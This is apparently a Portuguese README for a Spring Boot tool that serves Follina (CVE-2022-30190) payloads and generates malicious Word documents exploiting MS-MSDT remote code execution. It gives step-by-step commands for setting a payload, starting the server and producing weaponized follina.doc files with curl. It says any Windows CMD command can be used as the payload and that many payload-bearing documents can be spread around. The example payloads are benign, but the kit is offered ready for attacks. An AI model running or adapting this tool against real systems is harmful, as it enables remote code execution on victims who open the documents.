
Servidor para hospedar/ativar payloads do Follina e gerador de documentos maliciosos do Word que exploram o protocolo MS-MSDT. (CVE-2022-30190)
Este repositório contém uma aplicação Spring Boot simples que atua tanto como servidor para hospedar/ativar payloads Follina, quanto como gerador de documentos Word maliciosos que estão prontos para serem usados como vetores de ataque para explorar CVE-2022-30190.
Esta vulnerabilidade consiste em Execução Remota de Código através do MSDT (Microsoft Windows Support Diagnostic Tool).
Para servir um payload único de sua escolha, você deve:
export FOLLINA_PAYLOAD="notepad.exe"
mvn spring-boot:run
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
Se você quiser alterar o payload atual, primeiro terá que desativar o servidor ativo atualmente, e repetir os passos após definir o novo payload.
NOTA: o payload pode ser substituído por qualquer outro comando, desde que possa ser executado via CMD do Windows.
Para servir um payload do lado do cliente de sua escolha, você deve:
mvn spring-boot:run
cmd, por exemplo:curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
O payload neste caso está incorporado no documento, e simplesmente precisará de ativação ao contatar o servidor. Desta forma, você pode ter múltiplos payloads diferentes espalhados por diferentes documentos e não precisará reiniciar o servidor para acionar mudanças de payload - já que pode simplesmente gerar um novo documento com o payload desejado incorporado.
Muitos agradecimentos a John Hammond por ter criado a implementação em Python e compartilhado sua análise da CVE.